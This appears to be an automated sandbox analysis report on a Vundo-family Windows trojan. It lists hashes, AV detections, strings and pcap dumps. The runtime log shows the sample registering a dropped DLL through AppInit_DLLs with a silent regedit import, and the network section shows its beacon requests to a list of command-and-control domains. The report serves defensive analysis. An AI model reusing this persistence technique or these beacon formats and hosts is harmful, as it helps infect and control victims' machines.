Analysis | #totalhash

Analysis Date	2014-11-22 10:24:05
MD5	27693900b327b570d0aa240a2da1fbd9
SHA1	9f899723711a6fba750a102087c1409d8a2a3c41

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 2d1ba9174b64608447ea98175109840f sha1: b210ba5bf7fe4423441d2572a337dd82c256e5a9 size: 91648
Section	_ASM2 md5: 62c826d4ddef367d075c0cba0669f0a0 sha1: b240b0ac984e37c53bffb3e34f2fc960b9468d77 size: 63488
Section	.rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section	.data md5: 38e766bb1ef49e52025bc1f89e1812ff sha1: edbc9cadc0cfd216f791595068951582ff10913c size: 5120
Section	.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section	.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp	2012-09-25 04:15:44
Version	LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE
Packer	Microsoft Visual C++ ?.?
PEhash	ed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash	11c52178b812c23b7febf02fc8e99619
AV	360 Safe	Gen:Variant.Spy.5
AV	Ad-Aware	Gen:Variant.Spy.5
AV	Alwil (avast)	Vundo-XF [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Cidox.A.gen!Eldorado
AV	Avira (antivir)	TR/Vundo.Gen7
AV	BullGuard	Gen:Variant.Spy.5
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	Trojan.Vundo.Gen
AV	ClamAV	WIN.Trojan.Agent-164717
AV	Dr. Web	Trojan.Inject1.10169
AV	Emsisoft	Gen:Variant.Spy.5
AV	Eset (nod32)	Win32/Kryptik.AMFU
AV	Fortinet	W32/Citirevo.AB!tr
AV	Frisk (f-prot)	W32/Cidox.A.gen!Eldorado
AV	F-Secure	Gen:Variant.Spy.5
AV	Grisoft (avg)	Generic_r.BGN
AV	Ikarus	Trojan-Downloader.Win32.Vundo
AV	K7	Backdoor ( 04c4f2bf1 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Trojan.FakeMS.ED
AV	Mcafee	Vundo-FASV!27693900B327
AV	Microsoft Security Essentials	TrojanDropper:Win32/Vundo.V
AV	MicroWorld (escan)	Gen:Variant.Spy.5
AV	Rising	no_virus
AV	Sophos	Mal/Vundo-M
AV	Symantec	Trojan.Gen.2
AV	Trend Micro	TROJ_VUNDO.SMKK
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry	HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File	C:\WINDOWS\system32\hyjrqnc.dll
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Cookies\cf
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process	C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS	clickbeta.ru
Winsock DNS	denadb.com
Winsock DNS	91.220.35.154
Winsock DNS	terrans.su
Winsock DNS	tryatdns.com
Winsock DNS	clickclans.ru
Winsock DNS	denareclick.com
Winsock DNS	fescheck.com
Winsock DNS	instrango.com
Winsock DNS	verzinla.com
Winsock DNS	getintsu.com
Winsock DNS	tegimode.com
Winsock DNS	netrovad.com
Winsock DNS	nshouse1.com
Winsock DNS	veriolana.com
Winsock DNS	inzavora.com
Winsock DNS	odobvare.com
Winsock DNS	foradns.com
Winsock DNS	getavodes.com
Winsock DNS	clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\hyjrqnc.dll\\x00

Network Details:

DNS	getintsu.com Type: A 141.8.225.80
DNS	getavodes.com Type: A 141.8.225.80
DNS	tryatdns.com Type: A 209.222.14.3
DNS	fescheck.com Type: A 209.222.14.3
DNS	instrango.com Type: A 204.11.56.26
DNS	inzavora.com Type: A 141.8.225.80
DNS	denadb.com Type: A 204.11.56.26
DNS	foradns.com Type: A 141.8.225.62
DNS	veriolana.com Type: A
DNS	verzinla.com\032 Type: A
DNS	netrovad.com Type: A
DNS	odobvare.com Type: A
DNS	terrans.su Type: A
DNS	tegimode.com Type: A
DNS	clickstano.com Type: A
DNS	denareclick.com Type: A
DNS	clickbeta.ru Type: A
DNS	nshouse1.com Type: A
DNS	clickclans.ru Type: A
HTTP GET	http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent:
HTTP GET	http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7KXq7TYIaWNT User-Agent:
HTTP GET	http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7GWqf3nLQkm3 User-Agent:
HTTP GET	http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7C2CLOdXR1x7 User-Agent:
HTTP GET	http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7Bf8bvoXlKnf User-Agent:
HTTP GET	http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent:
HTTP GET	http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7EZ5+AFDzOit User-Agent:
HTTP GET	http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7DU5SDo9CRU2 User-Agent:
HTTP GET	http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7B4l6AvLbvw9 User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1035 ➝ 204.11.56.26:80
Flows TCP	192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1037 ➝ 204.11.56.26:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.62:80
Flows TCP	192.168.1.1:1039 ➝ 91.220.35.154:80

Raw Pcap

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374d68 48596676 566a6476 6d204854   x7MhHYfvVjdvm HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   74696e74 73752e63 6f6d0d0a 0d0a       tintsu.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374b58 71375459 4961574e 54204854   x7KXq7TYIaWNT HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206765   TP/1.1..Host: ge
0x000000e0 (00224)   7461766f 6465732e 636f6d0d 0a0d0a     tavodes.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374757 7166336e 4c516b6d 33204854   x7GWqf3nLQkm3 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207472   TP/1.1..Host: tr
0x000000e0 (00224)   79617464 6e732e63 6f6d0d0a 0d0a0a     yatdns.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374332 434c4f64 58523178 37204854   x7C2CLOdXR1x7 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206665   TP/1.1..Host: fe
0x000000e0 (00224)   73636865 636b2e63 6f6d0d0a 0d0a0a     scheck.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374266 3862766f 586c4b6e 66204854   x7Bf8bvoXlKnf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   73747261 6e676f2e 636f6d0d 0a0d0a     strango.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374d68 48596676 566a6476 6d204854   x7MhHYfvVjdvm HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   7a61766f 72612e63 6f6d0d0a 0d0a0a     zavora.com.....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   7837455a 352b4146 447a4f69 74204854   x7EZ5+AFDzOit HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a     nadb.com.......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374455 3553446f 39435255 32204854   x7DU5SDo9CRU2 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a     radns.com......

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 33362661   XX0000&key=736&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   36373926 6f733d35 2e312e32 3630302e   679&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677732 4a774f47 38324b46 415a6c49   ygw2JwOG82KFAZlI
0x000000b0 (00176)   54354b77 5a4f6263 6c436f74 4763306e   T5KwZObclCotGc0n
0x000000c0 (00192)   78374234 6c364176 4c627677 39204854   x7B4l6AvLbvw9 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323230 2e33352e 3135340d 0a0d0a     .220.35.154....

Strings

PM
a
..
.>uriVttcetorla
\
.CC
 
.
a.X
.uri

041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0E~oski
0SSSSS
_0=?YYe
1cucf'
1LZ]5nN8U`a
1mNlOc
28BHT}BHRX
4cz`M	5
	4juPo*22?
4twgS`
)59Ea<Yeiu
5xsylhhlSt
.6#K4M
:-6lBp?
6lW@9]
)7U	yu
7}~w/O
8;7780
>8-DSU
,8qCN/|5
".9p6n
9T#rr-@/
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
.agN_C;
;AKQMtkq{Gq
A<MN~j
An application has made an attempt to load the C runtime library incorrectly.
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
az :Wm?4
&b6Gqa
BeginPaint
bhrxT]
bhrxT]RX
=B@@qO
BtrV@cd
BX-,)E
C@3Du5
	C62rH
CIL\Z"
CloseHandle
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
}cRnRr&"A3Sp
- CRT not initialized
ctner?
Cw Crro1
@CwN+;%?
c|'_xh
@.data
DateTime:%04d.%02d:%d
dcdli=
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
dE|6I?
December
DecodePointer
DeleteCriticalSection
DestroyWindow
DeviceIoControl
DispatchMessageA
DltHr)
DOMAIN error
DrawTextA
DrleN\
eA&7eu
[eaTNe
eCee39
eg,Is;
_eipiF
,elSlX
EncodePointer
EndPaint
EnterCriticalSection
:ENU~5
erhN2sWct
erxDr& .ltF
>eteH!
 eu&0 dni
 eufp n/eR)
 euv@ vmt`mn gsF
_`EUY+
ExitProcess
.!e]Y|
EY;HI1
February
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
@FPY3vF9YP'
FqF1~ 
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
fuvpWuY
<	g5aO
gb pn7
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
G;gYd'
G!?<HW
gJvvP)
gmC#kQ
{gp\t(
gSORl6
	H2R.Lr
HcZ'Hjnn
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
^HfF*@L
HH:mm:ss
"HNDe#w
Hp7I	1h
)hPMu`
h/V}[c
Hy`<A_z>C
hyNvS(
ibBZJr
\iieSA
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`IymiL
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
J-F"&~
j/G3e8g
jI6Dto
j{i|FN#H
 'j^iM
j@j ^V
=J\L^f
jogwp6
K|{]@ 
.KAE!<nCVi
KERNEL32.dll
kfTr\,
!+kg H
kpJyM8'iT
kSp9&0D
>lBXS'9
lClfZt
LCMapStringA
LCMapStringW
LeaveCriticalSection
lEesOqr
lelV}VtrntG
liVee|tl
':Ljm	
l\	LQc
lLu.%I
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lP%Hsv
lstrcmpiA
lUG*BK
lWorr0dFl
,M4,=:
"~MbI	NuM
+M,C{E
MessageBoxA
 m Excemh5
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
@M@]QD
MultiByteToWideChar
ndudYTuaaF.2uMuH
|neei)
n iiL7
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N<@tjo
o2PsSvoduPi*tmWeI9Er
(O|&7;
October
)o`~f@+
ole32.dll
ortbcfu
|OslZ`
o sooIee  ?uS-id
p+F]HK
PG!|et
phJFsprm
Please contact the application's support team for more information.
P'mBEt
PPPPPPPP
P`/Rk	T
Program: 
<program name unknown>
%ptuiWYeo
- pure virtual function call
<q,)8g
q@dh0:
Qo%emcW<L
!*QuAJQZ
QueryPerformanceCounter
r`4Nt/
+R8jGh^
`.rdata
Rectangle
RegConnectRegistryA
RegisterClassExA
rGnrI0
RKEeupe
r\m3v@05
Rod\en
RrdTcy
RtlUnwind
runtime error 
Runtime Error!
rxVYeI
s;!69~0
Saturday
scm32.dll
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
/sh=,	
ShowWindow
SING error
+Sio4F
SjtUG9
~Soh@t
 s`pe cO*i
ssme%j
strcat
Sunday
SunMonTueWedThuFriSat
@@Su w
sV!8o_
SyDOW),
S:YW>%
t0@MBG^B
T]28bh
tCGTlM
TerminateProcess
)_TEW_
TextOutA
tH]eF|eo
This application has requested the Runtime to terminate it in an unusual way.
